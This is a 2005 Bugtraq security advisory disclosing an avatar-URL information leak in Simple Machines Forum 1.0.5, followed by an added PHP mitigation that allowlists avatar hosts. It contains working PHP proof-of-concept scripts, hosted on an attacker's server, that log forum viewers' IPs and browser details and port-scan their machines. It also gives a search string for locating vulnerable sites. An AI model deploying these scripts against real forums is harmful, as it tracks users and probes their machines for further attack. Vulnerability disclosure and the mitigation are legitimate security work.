List:       bugtraq
Subject:    Simple Machine Forum 1-0-5 (possibly prior versions) user IP
From:       retrogod () aliceposta ! it
Date:       2005-08-31 10:37:57
Message-ID: 20050831103757.20457.qmail () securityfocus ! com

Simple Machine Forum 1-0-5 (possibly prior versions) user IP address /
information disclosure

software:
site: http://www.simplemachines.org/

information disclosure:  
a user can choose and submit an avatar URL like this:

http://[evil_site]/image.php

where image.php is a file like this:

<?php
 // Appends one line per request; the bare $REMOTE_ADDR etc. rely on register_globals
 $log="log".date("Ymd").".txt";
 $fp=fopen($log,'a');
 fputs($fp,$REMOTE_ADDR.":".$REMOTE_PORT." - ".$HTTP_USER_AGENT."-".$HTTP_REFERER."-".$REQUEST_METHOD."-".$QUERY_STRING."-".$HTTP_ACCEPT_LANGUAGE."-".$REQUEST_URI."\r\n");
 fclose($fp);
?>

When forum users view a page that should show the avatar, a new line is appended
to log[date].txt on [evil_site] server, like this:

08.31.05 04.09 - 192.168.1.1:8562 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)-http://[target]/[path]/[page]-GET--it-/image.php

So an external user can monitor the forum activity in detail, collect user IP
addresses, get information on the OS and browsers used, and so on.

The evil script could also check for open ports/services on the target machines
(to send them exploit code), look for proxies or trojan ports, or do some other
stuff. Just an example:

<?php
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 1);
$log="log".date("Ymd").".txt";
$fp=fopen($log,'a');
fputs($fp,'open ports on '.$REMOTE_ADDR.": ");
$portlist="23;135;139;445;1080;3128;8080;12345";
$ports=explode(";",$portlist);
for ($i=0; $i<=count($ports)-1; $i++)
{
$ock=fsockopen($REMOTE_ADDR,$ports[$i]);
if ($ock) {fputs($fp,$ports[$i].' '); fclose($ock);}
}
fputs($fp,"\r\n");
fclose($fp);
//then a lot of creativity ;)
?>

googledork: "Powered by SMF"

rgod
site: http://rgod.altervista.org
mail: retrogod@aliceposta.it


original advisory: http://rgod.altervista.org/smf105.html
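
A mitigation sketch for the avatar URL leak described above, as an added example that is not part of the original post and not SMF code. The function name, host names and fallback path are assumptions made for illustration.

```php
<?php
// Added example, not SMF code. Host names and paths below are constructed.
// The leak happens because each viewer's browser fetches the avatar from a
// host the poster controls, so the effective control is which hosts the
// rendered page ever tells the browser to contact.

function avatar_src_for_output(string $url, array $allowedHosts, string $fallback): string
{
    $url   = trim($url);
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return $fallback;                 // relative, malformed or empty
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return $fallback;                 // any non-web scheme
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return $fallback;                 // userinfo can disguise the real host
    }
    // Exact host match only; a suffix test would accept forum.example.evil.test.
    $host = strtolower(rtrim($parts['host'], '.'));
    if (!in_array($host, $allowedHosts, true)) {
        return $fallback;                 // off-site host: never emitted
    }
    return $url;
}

$allowed  = ['forum.example', 'avatars.forum.example'];   // constructed allowlist
$fallback = '/avatars/default.png';                        // constructed local image
$samples  = [                                              // constructed inputs
    'https://avatars.forum.example/u/1042.png',
    'http://203.0.113.7/image.php',
    'http://203.0.113.7/image.jpg',   // extension proves nothing: the server picks the handler
    'https://forum.example.evil.test/a.png',
    'javascript:alert(1)',
];
foreach ($samples as $s) {
    $src = htmlspecialchars(avatar_src_for_output($s, $allowed, $fallback), ENT_QUOTES);
    printf("%-42s -> %s\n", $s, $src);
}
```

Only the first sample is emitted unchanged; the rest fall back to the local default image. A user who wants an off-site picture would have to upload it so the forum serves its own copy.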

